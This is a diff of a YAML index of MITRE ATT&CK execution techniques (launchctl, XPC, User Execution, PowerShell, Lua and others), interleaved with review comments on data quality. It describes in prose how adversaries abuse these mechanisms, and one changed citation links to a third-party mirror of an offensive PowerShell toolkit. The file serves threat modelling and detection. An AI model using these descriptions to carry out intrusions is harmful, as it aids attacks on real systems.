- url: https://ss64.com/osx/launchctl.html
- description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
- - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
- Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- source_name: Sofacy Komplex Trojan
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-20T20:14:35.179Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
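Review bot: this hunk is a pure key reorder of the T1569.001 object (platforms, domains, id, type and the four `external_references` entries move below the description), which buries the one substantive change, `modified` `'2022-04-25'` to `'2024-09-20'`, in a wall of removed lines. If the generator can emit keys in a stable order, future refreshes will show only real changes and reviewers can diff the reference list for content instead of position.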
@@ -25578,6 +25860,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
plist file on disk which can be monitored. Monitor for recently modified or
created plist files with a significant change to the executable path executed
@@ -25590,19 +25873,42 @@ execution:
are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
the services are unloaded prior to deleting plist files."
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- 'Service: Service Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+ created: '2020-03-10T18:26:56.187Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569/001
+ external_id: T1569.001
+ - source_name: Sofacy Komplex Trojan
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ - source_name: Launchctl Man
+ description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+ url: https://ss64.com/osx/launchctl.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1569.001
atomic_tests: []
T1059.008:
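Review bot: `x_mitre_permissions_required` (User, root) is dropped from T1569.001 at `- x_mitre_permissions_required:` with nothing replacing it. That matches the refreshed T1559 object later in this diff, but T1204.003 further down still carries `x_mitre_permissions_required: - User`, so anything reading that field will see it on some techniques and not others. Either document that the field is gone from refreshed objects or refresh T1204.003 in the same change. The `x_mitre_version` `'1.1'` to `'1.2'` and `x_mitre_attack_spec_version` `2.1.0` to `3.2.0` bumps are consistent with each other.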
@@ -25645,7 +25951,7 @@ execution:
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T20:28:09.848Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Device CLI
x_mitre_detection: |-
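Review bot: the `modified` timestamp for T1059.008 moves backwards, from `'2022-05-11T14:00:00.188Z'` to `'2022-04-19T20:28:09.848Z'`, and the object keeps `x_mitre_attack_spec_version: 2.1.0` rather than moving to 3.2.0 like the others. A regression in `modified` usually means this object came from a different (older) source bundle than the rest of the update; confirm this is the intended upstream value and not a stale copy before merging.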
@@ -25661,72 +25967,75 @@ execution:
x_mitre_remote_support: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1559.003:
technique:
- x_mitre_platforms:
- - macOS
+ modified: '2024-10-16T16:14:12.793Z'
+ name: XPC Services
+ description: |-
+ Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+ Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_contributors:
+ - Csaba Fitzl @theevilbit of Kandji
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Csaba Fitzl @theevilbit of Offensive Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ x_mitre_remote_support: false
type: attack-pattern
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
- x_mitre_version: '1.0'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1559.003
url: https://attack.mitre.org/techniques/T1559/003
+ external_id: T1559.003
- source_name: creatingXPCservices
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
description: Apple. (n.d.). Retrieved October 12, 2021.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
- url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
+ url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
- url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
- Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XPC Services
- x_mitre_detection: ''
- kill_chain_phases:
- - phase_name: execution
- kill_chain_name: mitre-attack
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Process: Process Access'
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204:
technique:
- modified: '2024-04-12T03:46:49.507Z'
+ modified: '2024-11-11T18:52:12.103Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ Adversaries may also deceive users into performing actions such as:
+
+ * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+ * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+ * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
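Review bot: the new T1204 bullet `* Coerceing users to copy, paste, and execute malicious code manually` has a typo (`Coercing`), and the bullet list runs straight into `For example, tech support scams can be facilitated...` with no blank line, so a Markdown renderer will treat that paragraph as a continuation of the last bullet. Both are upstream ATT&CK description text, so fix them upstream or accept them verbatim; hand-editing here will be reverted by the next regeneration. In the same hunk the T1559.003 contributor affiliation changes from `Offensive Security` to `Kandji`, and its `external_references` keep the same `url` and `description` values with only key order changed.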
@@ -25734,7 +26043,11 @@ execution:
phase_name: execution
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- - Goldstein Menachem
+ - Menachem Goldstein
+ - Harikrishnan Muthu, Cyble
+ - ReliaQuest
+ - Ale Houspanossian
+ - Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -25749,7 +26062,7 @@ execution:
- macOS
- IaaS
- Containers
- x_mitre_version: '1.6'
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Instance: Instance Start'
- 'File: File Creation'
@@ -25776,6 +26089,10 @@ execution:
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+ - source_name: Reliaquest-execution
+ description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+ Campaign. Retrieved August 2, 2024.
+ url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
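Review bot: the new reference spells the vendor `Reliaquest` in both `source_name: Reliaquest-execution` and `description: Reliaquest. (2024, May 31)`, while the contributor entry added to the same technique reads `ReliaQuest`. Citation resolution only needs the `(Citation: Reliaquest-execution)` tag in the description to match `source_name` exactly, which it does, so this is a style point for the upstream data rather than a blocker.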
@@ -25786,15 +26103,19 @@ execution:
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
+ - source_name: proofpoint-selfpwn
+ description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+ From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+ 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -25811,7 +26132,7 @@ execution:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -25859,7 +26180,7 @@ execution:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -25892,12 +26213,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1059.001:
technique:
- modified: '2024-03-01T18:01:37.575Z'
+ modified: '2024-10-15T16:39:13.228Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process
cmdlet which can be used to run an executable and the Invoke-Command
cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -25958,8 +26278,9 @@ execution:
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
- description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
- url: https://github.com/jaredhaight/PSAttack
+ description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+ 2024.
+ url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
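Review bot: the `Github PSAttack` reference URL changes from the author's repository `https://github.com/jaredhaight/PSAttack` to `https://github.com/Exploit-install/PSAttack-1`, a repository under an unrelated account. Pointing a tooling citation at a third-party mirror is a supply-chain risk: the mirror can diverge from what the reference describes, and readers of this file will download and run it. If the original repository is gone, prefer a Wayback Machine snapshot of the original URL and say in the description that it is an archived copy.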
@@ -25981,12 +26302,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.001
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26064,14 +26384,13 @@ execution:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1059.004:
technique:
- modified: '2024-04-16T12:24:40.163Z'
+ modified: '2024-10-15T15:17:19.136Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26129,36 +26448,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.004
atomic_tests: []
T1559:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- created: '2020-02-12T14:08:48.689Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- - source_name: Linux IPC
- url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
- description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
- March 11, 2022.
- - source_name: Fireeye Hunting COM June 2019
- url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
- 10, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-10T19:06:35.666Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
@@ -26179,25 +26473,110 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Process: Process Access'
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ created: '2020-02-12T14:08:48.689Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1559
+ external_id: T1559
+ - source_name: Fireeye Hunting COM June 2019
+ description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+ 10, 2019.
+ url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+ - source_name: Linux IPC
+ description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+ March 11, 2022.
+ url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1559
atomic_tests: []
+ T1059.011:
+ technique:
+ modified: '2024-10-01T15:19:54.163Z'
+ name: Lua
+ description: |-
+ Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
+
+ Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Script: Script Execution'
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+ created: '2024-08-05T18:19:42.201Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/011
+ external_id: T1059.011
+ - source_name: Kaspersky Lua
+ description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+ APT. Retrieved August 5, 2024.
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+ - source_name: Lua main page
+ description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+ url: https://www.lua.org/start.html
+ - source_name: Lua state
+ description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+ url: https://pgl.yoyo.org/luai/i/lua_State
+ - source_name: Cyphort EvilBunny
+ description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+ Instrumented By Lua. Retrieved August 5, 2024.'
+ url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+ - source_name: PoetRat Lua
+ description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+ public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+ url: https://blog.talosintelligence.com/poetrat-update/
+ - source_name: Lua Proofpoint Sunseed
+ description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+ Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+ Malware to Target European Governments and Refugee Movement. Retrieved August
+ 5, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1204.003:
technique:
x_mitre_platforms:
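Review bot: the new `T1059.011` entry has no `identifier:` key between `x_mitre_modified_by_ref` and `atomic_tests: []`, unlike `T1559` directly above it (`identifier: T1559`). Some older entries in this file omit it too, so check whether the index generator treats the map key as authoritative; if it reads `identifier`, the Lua technique will be missing from the generated indexes. Separately, the Lua description block scalar carries line breaks inside parentheses (`via scripts (.lua` / `)` and `through the struct lua_State` / `)`), which look like stripped `<code>` markup from the upstream description; the same artifact appears in the older T1059.001 and T1053.006 descriptions, so it is a generator issue rather than something specific to this entry.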
@@ -26226,7 +26605,7 @@ execution:
url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-26T16:42:35.318Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
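Review bot: `modified` for T1204.003 goes backwards, from `'2022-04-25T14:00:00.188Z'` to `'2021-08-26T16:42:35.318Z'`, the same regression pattern as T1059.008 earlier in this diff. Two objects in one update with timestamps moving into the past points at the generator reading from a mixed or older bundle; worth confirming the source before this lands as data.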
@@ -26253,30 +26632,12 @@ execution:
- 'Instance: Instance Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1204.003
atomic_tests: []
T1203:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1203
- url: https://attack.mitre.org/techniques/T1203
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:34:23.908Z'
+ name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
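Review bot: T1204.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no replacement visible, while keeping `x_mitre_permissions_required: - User`; every other object in this diff that drops `2.1.0` receives `3.2.0` in its place. Together with the backwards `modified` date in the previous hunk this looks like a half-refreshed object. Confirm the object still carries an attack spec version after this change, or refresh it fully.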
@@ -26293,9 +26654,10 @@ execution:
### Common Third-party Applications
